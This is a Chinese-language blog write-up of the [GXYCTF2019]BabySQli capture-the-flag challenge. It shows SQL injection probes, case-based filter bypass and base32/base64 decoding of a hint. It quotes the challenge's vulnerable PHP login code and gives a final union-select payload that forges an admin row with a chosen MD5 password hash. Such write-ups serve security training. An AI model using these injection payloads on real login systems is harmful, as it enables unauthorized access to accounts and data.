[GXYCTF2019]BabySQli 1

最新推荐文章于 2025-02-07 23:41:24 发布
最新推荐文章于 2025-02-07 23:41:24 发布
阅读量5.1k 收藏 5
点赞数 5
分类专栏: buuctf 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124141815
版权

SQL注入 大小写绕过 Base64解码 联合查询 Sqli特性和虚拟数据
关键词由CSDN通过智能技术生成

[GXYCTF2019]BabySQli 1

我们先判断注入点,发现注入点在 用户名('or 1=1-- q)

发现 or 被过滤掉,我们尝试使用大小写绕过,成功。
在这里插入图片描述

判断字段数:'OR 1=1 order by 1 – q

使用联合查询

'union select 1,2,3-- q

发现没有直接将回显返回出来

理论上来说,联合查询是不可以使用的

同时,这道题是会有返回了错误信息,是不是感觉报错注入在向自己招手?

想尝试的童鞋可以故意使用错误的sql语句看是否有错误信息回显

但痛苦的是,在本关过滤掉了 database(),最关键的是他把“()”也过滤掉了

~~>_<~~

我们只能看看源码的提示了:

在这里插入图片描述

发现是base32 编码解码后 是base64 编码
在这里插入图片描述
在这里插入图片描述

根据Base64和Base32 区别:
base64中包含大写字母(A-Z),小写字母(a-z),数字0—9以及+/;
base32中只包含大写字母(A-Z)和数字234567

解码后发现

select * from user where username = '$name'

同时,这一关利用sqli的特性:在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。

所以,如果我们使用联合查询访问,一个真实存在的用户名和一个我们自己编造的密码,就会使虚拟数据混淆admin密码,从而使我们成功登录,得到 flag

首先第一步判断回显点,利用穷举法,看页面回显判断

'union select 1,'admin',3-- q

假如,我们输入的是’union select1,2, ‘admin’-- q

页面回显 wrong user! 但我们知道 用户名是正确的,所以只能是位置错了。

由此判断出 admin的位置

'union select 1,'admin',3-- q

我们可以大胆猜测 是 id admin pwd

之后,无论怎办都不行

但,如果你点击这道题的出处,查看过源码的话就会明白

源码:

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
	function stripslashes_deep($value)
	{
		$value = is_array($value) ?
		array_map('stripslashes_deep', $value) :
		stripslashes($value);
		return $value;
	}

	$_POST = array_map('stripslashes_deep', $_POST);
	$_GET = array_map('stripslashes_deep', $_GET);
	$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
	$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

?>

在最后面的代码中中提到只有密码进行md5编码才会得到flag

我们构建payload

1' union select 1,'admin','202cb962ac59075b964b07152d234b70'-- q&pw=123

在这里插入图片描述

[GXYCTF2019] web题-BabySQli
BROTHERYY的博客
07-13 750
复现环境:buuoj.cn 查看页面源代码发现有个search.php,访问这个文件以后发现有base32编码 在网上对其解码后得到 在登录发现存在账号admin,使用联合查询 联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。 flag{360b0328-2477-4a68-801b-4f3fed8217a0} ...
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 5041
[GXYCTF2019]BabySQli 解题思路&过程
BUU28 [GXYCTF2019]BabySQli1【如何判断Base34/Base32】【联合查询返回虚拟数据】
最新发布
2401_86190146的博客
02-07 512
是用于开始一个查询的关键字,它们不能这样直接组合在一起,所以会导致语法错误。过滤掉了or,=,当尝试了n种方法以后,最关键的是发现()居然也被过滤了。当输入admin的时候,提示密码错误,这时候就说明用户名确实是admin。应用程序可能会将这行数据当作合法的用户记录进行处理,攻击者可能会以。抓包发现有注释掉的内容,其实这个直接看源代码也行(但是又忘了这步)正确查询: 1' union select 1,2,3#,这不符合 SQL 的语法规则。表的列数为 3 且数据类型兼容,注入的。在这个拼接后的语句中,
[GXYCTF2019]BabySQli1
m0_62706061的博客
10-17 1343
ctf
web buuctf [GXYCTF2019]BabySQli1
weixin_44214568的博客
03-18 1548
知识点:联合注入(当联合查询不存在时,联合查询就会构造一个虚拟的数据) 1.尝试在用户和密码选项中分别进行注入,1' or '1=1'# ;1 or 1=1#;。。。都无法注入 2.再输入1',用户一栏存在报错,且输入为字符型,尝试报错注入,也不行(可以用bp的fuzz,效率高点,根据response,能够知道or和()都被过滤了); 3.级联注入:在用户栏输入1' union select 1,2# 报错Error: The used SELECT statements have a differ
[GXYCTF2019]BabySQli(联合注入添加临时虚拟用户)
weixin_44110537的博客
09-25 236
先模糊测试. 419长度的都是被过滤掉的. 但是幸运的是发现or在大写之后绕过了过滤. 于是猜测order也可以通过大写来绕过.(真的可以). 而union并没有被过滤.说明采用联合注入很有可能是可行的. 先通过 order by 来测有几列. 通过不断二分最终可以测出一共有3个字段. 在查询过程中如果数据库中没有对应的结果,会临时创建一个虚拟用户 举例: 这是查询前的表. 接着我们尝试查询一个不存在的数据. 可能这样还不够直观,通过联合查询将直观性体现出来.(联合查询时注意列数) 可以发现多了
[gxyctf2019]babysqli
03-16
"babysqli" 是一个 SQL 注入的题目,通常用于漏洞挖掘和安全测试目的。它通常包含一个网页表单,该表单将用户输入的数据插入到 SQL 查询中,如果网站没有正确地过滤和验证用户输入,那么攻击者可能能够通过注入恶意 ...
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 161
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
GXYCTF2019--BabySQli
Oavinci的博客
06-28 873
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
[GXYCTF2019]BabySQli
devilare的博客
05-18 477
[GXYCTF2019]BabySQli 刷题笔记 随便登录试试 好像是有admin这个用户名(一般都有QAQ),加入单引号,爆出错误,加入常规操作发现始终回显一样,看看源代码 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 百度一下,会发现这个是base32+base64加密得到的,解密后得到select * from user whe...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值